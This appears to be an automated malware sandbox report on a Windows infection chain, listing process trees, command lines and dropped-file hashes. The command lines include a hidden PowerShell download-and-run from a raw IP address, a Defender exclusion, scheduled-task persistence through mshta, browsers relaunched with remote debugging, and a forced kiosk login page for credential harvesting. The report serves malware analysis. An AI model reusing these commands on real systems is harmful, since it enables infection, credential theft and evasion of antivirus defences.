PID 4972 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
PID 1556 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe
PID 1556 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe
PID 4152 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4152 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
PID 4972 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
PID 4972 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
PID 4972 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
PID 4972 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
PID 4972 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
PID 2668 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2668 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"

C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 796

C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4496 -ip 4496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 800

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\Oar936gK\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99555cc40,0x7ff99555cc4c,0x7ff99555cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2236 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4232,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4452 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4448 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4616,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5260 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5400 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4860,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5344 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9955646f8,0x7ff995564708,0x7ff995564718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\a1vsr" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe

"C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe"

C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe

"C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe"

C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe

"C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 4036"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe

"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"

C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe

"C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1288b6b4-acc0-4fb8-b3e0-bf258b5d3e09} 868 "\\.\pipe\gecko-crash-server-pipe.868" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2428 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {919343b5-487f-4bb9-8234-2ba94088cbb6} 868 "\\.\pipe\gecko-crash-server-pipe.868" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2952 -childID 1 -isForBrowser -prefsHandle 3092 -prefMapHandle 3084 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd8b631e-889c-4d04-95d5-5f47b1f657a2} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3768 -childID 2 -isForBrowser -prefsHandle 3760 -prefMapHandle 2656 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fb1000a-5b0a-4287-ba1f-a802406fb8d8} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4532 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4488 -prefMapHandle 4548 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ada337d-3d57-4a67-9e56-019689dfa887} 868 "\\.\pipe\gecko-crash-server-pipe.868" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 3 -isForBrowser -prefsHandle 5260 -prefMapHandle 5256 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9825762a-9206-4b62-a43c-d05bccd37969} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 4 -isForBrowser -prefsHandle 5404 -prefMapHandle 5408 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cefbf1c8-a3c1-48a8-91dd-114db38a2a66} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 5 -isForBrowser -prefsHandle 5592 -prefMapHandle 5596 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {078f9894-34c5-4f6f-b514-41aca0c5dcc7} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab

C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe

"C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe"

C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe

"C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn U46nTma0qtq /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZhnsozvtJ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'T2V75N5KCPZXOWYLTGU2QWHAP8OYMKGH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

Network


Files

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_wmi.pyd

MD5 827615eee937880862e2f26548b91e83
SHA1 186346b816a9de1ba69e51042faf36f47d768b6c
SHA256 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32
SHA512 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_hashlib.pyd

MD5 a25bc2b21b555293554d7f611eaa75ea
SHA1 a0dfd4fcfae5b94d4471357f60569b0c18b30c17
SHA256 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d
SHA512 b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\zstandard\backend_c.pyd

MD5 0fc69d380fadbd787403e03a1539a24a
SHA1 77f067f6d50f1ec97dfed6fae31a9b801632ef17
SHA256 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc
SHA512 e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\vcruntime140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

MD5 e1c6ff3c48d1ca755fb8a2ba700243b2
SHA1 2f2d4c0f429b8a7144d65b179beab2d760396bfb
SHA256 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa
SHA512 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\charset_normalizer\md.pyd

MD5 71d96f1dbfcd6f767d81f8254e572751
SHA1 e70b74430500ed5117547e0cd339d6e6f4613503
SHA256 611e1b4b9ed6788640f550771744d83e404432830bb8e3063f0b8ec3b98911af
